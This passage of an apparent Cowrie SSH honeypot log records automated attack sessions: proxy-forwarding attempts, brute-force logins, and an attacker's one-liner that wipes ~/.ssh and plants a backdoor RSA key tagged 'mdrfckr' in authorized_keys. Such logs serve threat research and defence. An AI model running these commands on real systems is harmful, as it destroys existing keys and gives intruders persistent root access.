\\xe5\\x11q\\x9c\\xf3\\xfbs`\\xeb*ev<v\\x14\\xd1\\xc4T\\xc9s\\xb3\\x8e\\x8aU \\x1c:[\\x16\\x1c5J\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T06:29:04.968663Z","src_ip":"212.227.125.160","session":"cd2a1087fab8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"104.76.24.222","dst_port":443,"src_ip":"212.227.125.160","src_port":56306,"message":"direct-tcp connection request to 104.76.24.222:443 from 127.0.0.1:56306","sensor":"my-vps","timestamp":"2025-08-31T06:29:05.185755Z","session":"cd2a1087fab8"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:05.431542Z","src_ip":"212.227.235.229","session":"4b474ff318c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"104.76.24.222","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03`X\\n\\xf5\\xa0\\x95\\xa8,\\xad\\x1d\\x1a\\x03\\n\\x814\\x10\\x87Q[\\xd4\\xda\\xc5D\\x83_\\xbdz\\x8e`\\x83\\xf8\\xf8 \\xf4\\x0b\\x9c\\x01\\xe4L\\xcc\\xbd\\xd3.\\xea-L*N\\xa1\\x9d\\xab\\xc0\\x16\\x81\\x08\\xda{\\x15\\xbb\\xef\\x98\\xc6\\xd6\\x0c\\xd1\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 <\\xb1\\xf22^\\xfc\\x16$\\xd4\\xa4\\xba\\x87\\xf5\\xf2\\x1e\\x89\\xd0h\\xf0\\xcb\\xfb\\x13X[\\xa5`(\\x84 m\\xd8Y\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 104.76.24.222:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03`X\\n\\xf5\\xa0\\x95\\xa8,\\xad\\x1d\\x1a\\x03\\n\\x814\\x10\\x87Q[\\xd4\\xda\\xc5D\\x83_\\xbdz\\x8e`\\x83\\xf8\\xf8 \\xf4\\x0b\\x9c\\x01\\xe4L\\xcc\\xbd\\xd3.\\xea-L*N\\xa1\\x9d\\xab\\xc0\\x16\\x81\\x08\\xda{\\x15\\xbb\\xef\\x98\\xc6\\xd6\\x0c\\xd1\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 <\\xb1\\xf22^\\xfc\\x16$\\xd4\\xa4\\xba\\x87\\xf5\\xf2\\x1e\\x89\\xd0h\\xf0\\xcb\\xfb\\x13X[\\xa5`(\\x84 m\\xd8Y\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T06:29:06.203423Z","src_ip":"212.227.125.160","session":"cd2a1087fab8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.203.132","dst_port":443,"src_ip":"212.227.125.160","src_port":57402,"message":"direct-tcp connection request to 142.250.203.132:443 from 127.0.0.1:57402","sensor":"my-vps","timestamp":"2025-08-31T06:29:06.280607Z","session":"cd2a1087fab8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.203.132","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xdbu\\xc6\\x1e\\x9aKF\\xd9S\\xda5\\xba\\xa6\\xb9\\x9a\\r\\xe2\\xcf\\xda\\xb4\\xce\\nG\\xed7\\xfb@`\\xebQ*\\xe4 \\xa3W\\x1d\\x0b\\xcf]\\xf3\\xae\\xf9\\x89BN\\xd3\\x88+=\\xe4X\\xfa\\xa5\\xddLS\\x1b'{QZ\\xd1\\x1c\\xb6B\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 ti<c\\xb4g}\\nrQ,\\xc4\\x8f\\x97\\xeflb\\xb6\\rub\\x98\\xb3\\xa2l\\xd6\\x8b\\x9c\\x82\\xe1\\xc3\\t\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.203.132:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xdbu\\xc6\\x1e\\x9aKF\\xd9S\\xda5\\xba\\xa6\\xb9\\x9a\\r\\xe2\\xcf\\xda\\xb4\\xce\\nG\\xed7\\xfb@`\\xebQ*\\xe4 \\xa3W\\x1d\\x0b\\xcf]\\xf3\\xae\\xf9\\x89BN\\xd3\\x88+=\\xe4X\\xfa\\xa5\\xddLS\\x1b'{QZ\\xd1\\x1c\\xb6B\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 ti<c\\xb4g}\\nrQ,\\xc4\\x8f\\x97\\xeflb\\xb6\\rub\\x98\\xb3\\xa2l\\xd6\\x8b\\x9c\\x82\\xe1\\xc3\\t\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T06:29:06.699654Z","src_ip":"212.227.125.160","session":"cd2a1087fab8"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:06.791608Z","src_ip":"212.227.125.160","session":"cd2a1087fab8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40552,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ce3461cc64c","protocol":"ssh","message":"New connection: 212.227.235.229:40552 (1.2.3.4:22) [session: 8ce3461cc64c]","sensor":"my-vps","timestamp":"2025-08-31T06:29:07.580266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:29:07.581240Z","src_ip":"212.227.235.229","session":"8ce3461cc64c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:29:07.862487Z","src_ip":"212.227.235.229","session":"8ce3461cc64c"}
{"eventid":"cowrie.login.success","username":"root","password":"1qwe","message":"login attempt [root/1qwe] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:29:09.027864Z","src_ip":"212.227.235.229","session":"8ce3461cc64c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:29:09.605323Z","src_ip":"212.227.235.229","session":"8ce3461cc64c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:29:09.605992Z","src_ip":"212.227.235.229","session":"8ce3461cc64c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:29:09.607108Z","src_ip":"212.227.235.229","session":"8ce3461cc64c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:09.889331Z","src_ip":"212.227.235.229","session":"8ce3461cc64c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:29:10.508414Z","src_ip":"212.227.235.229","session":"8ce3461cc64c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:29:10.509164Z","src_ip":"212.227.235.229","session":"8ce3461cc64c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:29:10.792451Z","src_ip":"212.227.235.229","session":"8ce3461cc64c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:10.793324Z","src_ip":"212.227.235.229","session":"8ce3461cc64c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41746,"dst_ip":"1.2.3.4","dst_port":22,"session":"7eaaf9102aef","protocol":"ssh","message":"New connection: 212.227.235.229:41746 (1.2.3.4:22) [session: 7eaaf9102aef]","sensor":"my-vps","timestamp":"2025-08-31T06:29:11.062848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:29:11.063807Z","src_ip":"212.227.235.229","session":"7eaaf9102aef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:29:11.350057Z","src_ip":"212.227.235.229","session":"7eaaf9102aef"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:29:12.500166Z","src_ip":"212.227.235.229","session":"7eaaf9102aef"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:13.780486Z","src_ip":"212.227.235.229","session":"7eaaf9102aef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42826,"dst_ip":"1.2.3.4","dst_port":22,"session":"a12f80df33fa","protocol":"ssh","message":"New connection: 212.227.235.229:42826 (1.2.3.4:22) [session: a12f80df33fa]","sensor":"my-vps","timestamp":"2025-08-31T06:29:14.067288Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:29:14.068216Z","src_ip":"212.227.235.229","session":"a12f80df33fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-s